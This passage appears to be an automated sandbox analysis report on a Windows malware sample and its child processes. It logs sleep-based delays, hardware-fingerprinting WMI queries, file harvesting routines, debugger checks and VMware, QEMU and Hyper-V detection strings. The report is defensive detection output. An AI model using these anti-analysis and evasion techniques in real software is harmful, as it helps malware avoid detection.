                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exe TID: 8132Thread sleep time: -3783942s >= -30000s
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe TID: 2812Thread sleep time: -922337203685477s >= -30000s
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\08070809Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.3.exeKey opened: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Keyboard Layouts\04070809Jump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT SerialNumber FROM Win32_BaseBoard
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_BIOS
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT UUID FROM Win32_ComputerSystemProduct
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT ProcessorId FROM Win32_Processor
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_Processor
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeLast function: Thread delayed
                                Source: C:\Users\user\AppData\Local\Temp\FCBAECGIEB.exeLast function: Thread delayed
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile Volume queried: C:\Users\user\AppData\Local\Temp FullSizeInformationJump to behavior
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00412570 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_00412570
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040D1C0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,1_2_0040D1C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004015C0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_004015C0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00411650 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,1_2_00411650
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040B610 GetDateFormatA,FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,1_2_0040B610
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040DB60 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,1_2_0040DB60
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00411B80 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,1_2_00411B80
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_0040D540 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,1_2_0040D540
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004121F0 GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,1_2_004121F0
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C86261E __EH_prolog3_GS,GetFullPathNameW,PathIsUNCW,GetVolumeInformationW,CharUpperW,FindFirstFileW,FindClose,lstrlenW,2_2_6C86261E
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00401120 GetSystemInfo,ExitProcess,1_2_00401120
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51305
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 60000
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59844
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59735
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32253
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59610
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34891
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59463
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59321
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59201
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 48913
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 59087
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40210
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58976
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 50915
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58860
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58734
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58611
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58497
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58387
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58275
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47902
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58163
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 39526
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58051
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57941
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56661
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57829
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49766
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57718
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 35830
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57606
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57493
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43265
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57381
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55387
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57267
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 40637
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 57117
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31819
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56992
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 49549
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56887
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56766
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56328
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56547
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 46596
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56393
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56259
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 32008
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56151
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38067
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 56042
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55924
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31695
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55817
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34264
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55636
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34058
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 58670
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55529
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55400
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55295
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 31647
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55183
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55071
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54945
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 51976
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54832
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 34549
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 45915
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54719
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54609
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 55255
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54498
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54387
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 33199
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54275
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54163
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 54052
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 43277
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 47778
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53939
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53822
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53716
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 53604
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 38506
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeThread delayed: delay time: 922337203685477
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\userJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\Temp\u42w.2Jump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppDataJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\TempJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeFile opened: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeJump to behavior
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Microsoft Hyper-V Server
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWA1`
                                Source: MSBuild.exe, 00000010.00000002.2886557359.00000000013DF000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllV
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1743305315.0000000004A4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: 07500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: 6without Hyper-V for Windows Essential Server Solutions
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Datacenter without Hyper-V Core
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: noreply@vmware.com0
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: QEMU_HARDU
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Standard without Hyper-V Full
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1!0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Enterprise without Hyper-V Core
                                Source: u42w.3.exe, 00000005.00000003.2040498563.0000000000B6B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                                Source: g77dRQ1Csm.exe, 00000000.00000002.1898621096.0000000003019000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmp, u42w.0.exe, 00000001.00000002.2090394875.0000000002FB5000.00000004.00000020.00020000.00000000.sdmp, SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe, 0000000E.00000002.2960219517.00000173F894D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: u42w.0.exe, 00000001.00000002.2090394875.0000000002F5C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: http://www.vmware.com/0/
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.1
                                Source: cmd.exe, 00000011.00000002.2204535779.0000000005421000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: VMware, Inc.0
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Standard without Hyper-V Core
                                Source: u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: VMWARE_VIRTUAL
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Datacenter without Hyper-V Full
                                Source: g77dRQ1Csm.exe, 00000000.00000003.1773870952.0000000005E0E000.00000004.00000020.00020000.00000000.sdmp, u42w.3.exe, 00000005.00000000.1772107020.000000000041C000.00000020.00000001.01000000.0000000C.sdmpBinary or memory string: Enterprise without Hyper-V Full
                                Source: g77dRQ1Csm.exe, 00000000.00000002.1900142864.0000000004A05000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-96197
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95151
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95154
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95172
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95165
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95204
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeAPI call chain: ExitProcess graph end nodegraph_1-95180
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeAPI call chain: ExitProcess graph end node
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeProcess information queried: ProcessInformationJump to behavior
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_007FD15B VirtualProtect ?,-00000001,00000104,?,?,?,000000002_2_007FD15B
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00416240 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,1_2_00416240
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_004139E7 mov eax, dword ptr fs:[00000030h]0_2_004139E7
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_02F6766B push dword ptr fs:[00000030h]0_2_02F6766B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315092B mov eax, dword ptr fs:[00000030h]0_2_0315092B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03150D90 mov eax, dword ptr fs:[00000030h]0_2_03150D90
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03163C4E mov eax, dword ptr fs:[00000030h]0_2_03163C4E
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00415DC0 mov eax, dword ptr fs:[00000030h]1_2_00415DC0
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00420AEA GetProcessHeap,0_2_00420AEA
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeProcess token adjusted: Debug
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess token adjusted: Debug
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409A73 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00409A73
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409C06 SetUnhandledExceptionFilter,0_2_00409C06
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_00409EBE SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00409EBE
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0041073B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_0041073B
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_0315A125 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_0315A125
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_031609A2 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_031609A2
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03159E6D SetUnhandledExceptionFilter,0_2_03159E6D
                                Source: C:\Users\user\Desktop\g77dRQ1Csm.exeCode function: 0_2_03159CDA IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_03159CDA
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00419DC7 SetUnhandledExceptionFilter,1_2_00419DC7
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_00417B4E IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_00417B4E
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_004173DD memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_004173DD
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C03B66C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,1_2_6C03B66C
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6C03B1F7 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6C03B1F7
                                Source: C:\Users\user\AppData\Local\Temp\u42w.0.exeCode function: 1_2_6CA1AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,1_2_6CA1AC62
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_007FC1FD IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_007FC1FD
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_00806678 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00806678
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C942782 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_6C942782
                                Source: C:\Users\user\AppData\Local\Temp\u42w.2\run.exeCode function: 2_2_6C9490E9 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_6C9490E9
                                Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exeMemory allocated: page read and write | page guard

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
